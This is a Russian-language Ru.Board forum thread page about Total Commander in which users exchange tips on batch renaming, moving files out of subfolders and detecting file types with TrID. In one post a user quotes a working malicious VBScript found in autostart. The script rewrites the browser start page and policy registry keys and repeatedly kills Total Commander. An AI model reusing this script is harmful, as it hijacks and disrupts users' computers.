Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Компьютеры » Программы » Total Commander (Часть 7)

Модерирует : gyra, Maz

articlebot (19-12-2012 23:27): переезжаем в новую тему, Часть 8  Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313

   

Widok



Moderator-Следопыт
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору


 
Текущая финальная версия: 8.01 (32-битная/64-битная/32+64) (3.08.2012)
 
Предыдущие версии: 8.0x: 8.0 (32/64/32+64); 7.5x: 7.57a; 7.0x: 7.04a
 
Коллекция предыдущих версий
Новейшая история изменений (англ.)  

Кто знает, когда ждать финальную версию x.xx?
"Когда будет готова!" — © К. Гислер
На вопрос "Когда будет русик к версии x.xx?" ответ точно такой же — © CaptainFlint

Полный набор русификации от CaptainFlint и Avada
v8.0+ (8.01, 12.12.2012, с переводом справки): CHM (зеркало), HLP (зеркало)
 
Начиная с версии 7.50 стандартный набор русификации от тех же авторов входит в дистрибутив TC!
 
Стандартный набор русификации от М. Жилина
v7.55+ (7.51.01, 27.02.2010): Здесь

Официальный сайт разработчика | Официальный форум TC | Русский сайт TC | Русский форум TC

Все вопросы по плагинам и аддонам — в Плагинах
Настроенные сборки Total Commander (и все вопросы по ним)
Все вопросы по лечению пациента — только в Варезнике


Русская справка (онлайновый вариант для TC 8.01, 12.12.2012)
Total Commander Knowledge Base (Wiki-сборник статей и ответов на вопросы)  
Оффлайновая версия TCKB (CHM, закачка версии 1.7)
Все команды Total Commander 8.01 (справочные таблицы)
Все стандартные клавиши Total Commander 8.01 (справочные таблицы)

Всего записей: 24190 | Зарегистр. 07-04-2002 | Отправлено: 13:11 01-06-2010 | Исправлено: Avada, 07:16 12-12-2012
Avada



Gold Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
sikemo
Открываем справку и находим описание контекстного меню с командами для загрузки имён из файла. Из важного могу добавить только одно: число строк в файле-списке должно точно совпадать с числом имён файлов, открытых в инструменте группового переименования, иначе функция работать не будет.

Всего записей: 5611 | Зарегистр. 31-07-2008 | Отправлено: 22:44 03-08-2011
sikemo

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
спасибо. Когда-то и читал, и проделывал, но позабыл. Не зря говорят RTFM. Спасибо.

Всего записей: 1149 | Зарегистр. 27-11-2008 | Отправлено: 22:55 03-08-2011
Leksandr

Junior Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Rush как оказалось, ты прав! только тут вирус и что интересно его кроме авиры ни один антивир не определил.  
в автозагрузке был вот этот скриптик smit.dll.vbs

Код:
 on error resume next  
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regwrite"HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http:\\www.porno.хх"  
s.regwrite"HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown\IExplorer","0","REG_DWORD"  
s.regwrite"HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFindFiles","1","REG_DWORD"  
s.regwrite"HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoNavButtons","1","REG_DWORD"  
do  
wscript.sleep 7000  
s.run"taskkill /f /im totalcmd.exe",0  
s.run"C:\Windows\System\XIL.bat",0  
loop  
 

 
Потом и по батнику тельца нашел...

Всего записей: 101 | Зарегистр. 07-12-2004 | Отправлено: 11:09 04-08-2011 | Исправлено: Leksandr, 11:09 04-08-2011
Mark012



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
WatsonRus
Это удобно делать в Проводнике через Поиск. Правда, если имена в подпапках совпадают, доверять Проводнику автоматическое переименование нельзя, такую кашу заварит - не расхлебаешь.
Если речь идет об mp3-файлах, рекомендую TagScanner

Всего записей: 641 | Зарегистр. 13-09-2007 | Отправлено: 13:54 04-08-2011
Rodny



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
WatsonRus 21:37 03-08-2011
Цитата:
Есть группа папок, в каждой из них в подпапке с одинаковым именем лежат файлы. Нужно во всех папках переместить все эти файлы из подпапок в родительскую папку. Возможно ли в TC это сделать одной операцией сразу во всех папках?

Что-то вроде такого?

Всего записей: 2873 | Зарегистр. 28-07-2006 | Отправлено: 12:32 05-08-2011
WatsonRus



Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Rodny
Спасибо, именно то.
 
Надо будет попробовать. Как я понял, скрипт надо просто на кнопку повесить с параметром списка %L, выделить папки и поехало?
 
Добавлено:
У меня ситуация даже проще, чем там описано, ибо надо только переместить, в папках верхнего уровня нет файлов, заменять ничего не требуется.
 
Добавлено:
Mark012
Проводник я уже забыл как выглядит. TC рулит, еще ни разу не было того, чего бы нельзя в нем было сделать (с плагинами или без).

Всего записей: 24468 | Зарегистр. 03-05-2004 | Отправлено: 18:20 05-08-2011
Rodny



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
WatsonRus 17:20 05-08-2011
Цитата:
Как я понял, скрипт надо просто на кнопку повесить с параметром списка %L, выделить папки и поехало?

Да. Ещё если группа папок не меняется, можно постоянный файл-список вместо %L вписать.

Всего записей: 2873 | Зарегистр. 28-07-2006 | Отправлено: 19:39 05-08-2011
sikemo

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
У меня ситуация даже проще, чем там описано, ибо надо только переместить, в папках верхнего уровня нет файлов, заменять ничего не требуется.  

Типа скинуть все фотографии в корневую папку?

Всего записей: 1149 | Зарегистр. 27-11-2008 | Отправлено: 20:38 05-08-2011
WatsonRus



Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
sikemo 20:38 05-08-2011
Цитата:
Типа скинуть все фотографии в корневую папку?

есть

Код:
c:\papka1\papka\file1.ext
...
c:\papka1\papka\fileN.ext
c:\papka2\papka\file1.ext
...
c:\papka2\papka\fileN.ext
c:\papka3\papka\file1.ext
...
c:\papka3\papka\fileN.ext
...
c:\papkaN\papka\file1.ext
...
c:\papkaN\papka\fileN.ext

надо

Код:
c:\papka1\file1.ext
...
c:\papka1\fileN.ext
c:\papka2\file1.ext
...
c:\papka2\fileN.ext
c:\papka3\file1.ext
...
c:\papka3\fileN.ext
...
c:\papkaN\file1.ext
...
c:\papkaN\fileN.ext

Вот этим скриптом это и будет сделано. А у автора темы на forum.wincmd.ru кроме этого еще и файлы в первом уровне папок присутствуют, и ему их надо заменить.
 
 
Rodny
Все получилось отлично.  
Жаль только скрипт никак не сообщает об окончании своей работы...

Всего записей: 24468 | Зарегистр. 03-05-2004 | Отправлено: 22:15 05-08-2011 | Исправлено: WatsonRus, 19:38 06-08-2011
Boris Smirnov

Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Вот какая проблема. На Windows 7 установлен Total Commander v7.56a и WFX-плагин NokiaFS (v0.0.2.0.r4 - последняя на данный момент) для доступа к файловой системе телефонов Nokia N73. Стоит также Nokia PC Suite последней версии 7.1.60.0.
 
Происходит странная вещь: при просмотре записанных диктофоном файлов на Nokia через Total Commander дата записи в ИМЕНАХ файлов штампуется правильно. Но вот в атрибутах файлов в Total Commandere время записи показывается на 4 часа меньшее.
 
Смотрю атрибуты через Windows Explorer (Проводник) и вижу, что атрибут записанных файлов  показываются правильно (соответствует дате и времени записи, проштампованным в имени файла).
 
При копировании через плагин NokiaFS записанных файлов на компьютер атрибуты файлов так и копируются - на 4 час меньшие по сравнению с фактическим временем записи.
 
Разница в 4 часа наводит на мысль что где-то что-то связано с регионом - Москва (GMT+4 часа).
 
Но непонятно чей глюк? - Totala? плагина NokiaFS? Самого телефона? Как исправить ситуацию, чтобы атрибуты записанных файлов соответствовали фактическому времени записи.
 
Копировать через Проводник Windows Не предлагать. Во-первых, неудобно - не зря плагин NokiaFS создавался, во вторых при использовании Копирования-Вставки через Проводник все равно проблема с атрибутами - Проводник меняет дату и время на время их копирования на компьютер.
 
 
 
 
 
 
 

Всего записей: 341 | Зарегистр. 04-11-2001 | Отправлено: 21:30 07-08-2011
Avada



Gold Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Boris Smirnov
А одной темы (по плагинам TC) для обсуждения этой проблемы недостаточно?

Всего записей: 5611 | Зарегистр. 31-07-2008 | Отправлено: 22:13 07-08-2011
AftarJjet



BANNED
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Есть куча различных файлов,  все без расширений.
Листер их открывает правильно, очевидно, он смотрит на заголовок. pdf так, doc так, exe эдак.
Мне необходимо как-то автоматически обработать несколько тысяч подобных файлов, при этом переименовать/добавить соответствующее расширение файла.
Каким образом?

Всего записей: 1829 | Зарегистр. 11-01-2009 | Отправлено: 22:52 07-08-2011
Avada



Gold Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AftarJjet
Прошу прощения, а где подобное вообще можно сделать даже теоретически? Просмотр Листером и изменение расширения в ИГП — это же непересекающийся функционал. К тому же в работе Lister-плагинов с этим самым автоопределением без учёта расширения я не раз наблюдал ошибки.

Всего записей: 5611 | Зарегистр. 31-07-2008 | Отправлено: 22:52 07-08-2011 | Исправлено: Avada, 23:04 07-08-2011
AftarJjet



BANNED
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Avada
Ок, вот скрин, что имеем:

 
выбираем какой-то файл:

 
открываем его в Листере:

 
Как видно, Листер правильно определил что перед ним, и открыл с соответствующим плагином SumatraPDF. Но внешне, этот файл не отличается от тысяч других файлов.
Вот мне и необходимо как-то выдрать ис заголовков этих файлов его тип, и выставить соответствующее расширение.

Всего записей: 1829 | Зарегистр. 11-01-2009 | Отправлено: 23:09 07-08-2011
DrakonHaSh



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AftarJjet
тоталом никак, в нем подобный функционал не предусмотрен.
 
надо самому ручками по сигнатурам файлов искать. и тут, по моему, тотал не особо будет полезен. ведь во встроенном поиске нельзя задавать поиск по содержимому вида:  
{начало файла}SIG
или я ошибаюсь ?

Всего записей: 1951 | Зарегистр. 08-01-2008 | Отправлено: 23:11 07-08-2011
AftarJjet



BANNED
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Если ТС не справится, может есть какой-то другой рецепт?
 
Максимум, это я проиндексировал всё содержимое папки с Archivarius 3000, вроде он сделал всё правильно, по крайней мере с теми форматами, с которыми он работает. Значит он тоже смотрит в первую очередь на заголовок, а не на расширение.

Всего записей: 1829 | Зарегистр. 11-01-2009 | Отправлено: 23:11 07-08-2011 | Исправлено: AftarJjet, 23:17 07-08-2011
GORA2



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AftarJjet
Попробуйте TrID - File Identifier

Всего записей: 1271 | Зарегистр. 26-01-2006 | Отправлено: 23:16 07-08-2011
DrakonHaSh



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AftarJjet

Цитата:
Если ТС не справится, может есть какой-то другой рецепт?

http://mark0.net/soft-trid-e.html

Всего записей: 1951 | Зарегистр. 08-01-2008 | Отправлено: 23:19 07-08-2011
AftarJjet



BANNED
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
GORA2
DrakonHaSh

То, что надо! Работает.
 
Добавлено:
Классная тулза.

Всего записей: 1829 | Зарегистр. 11-01-2009 | Отправлено: 23:32 07-08-2011
Avada



Gold Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AftarJjet
Делаем следующее:
1. Скачиваем отсюда плагин WDX TrID и устанавливаем по общим правилам.
2. Открываем проблемные файлы в окне ИГП.
3. Имя не трогаем, а в расширении вместо [E] указываем [=trid.Match 0.Extension].
Проверялось на небольшом числе файлов EXE, DOC и PDF, результаты хорошие, но за полную безошибочность при большом числе разных файлов ручаться не берусь. Пробуем на свой страх и риск.  

Всего записей: 5611 | Зарегистр. 31-07-2008 | Отправлено: 23:43 07-08-2011
   

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313

Компьютерный форум Ru.Board » Компьютеры » Программы » Total Commander (Часть 7)
articlebot (19-12-2012 23:27): переезжаем в новую тему, Часть 8


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.Board
© Ru.Board 2000-2018

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru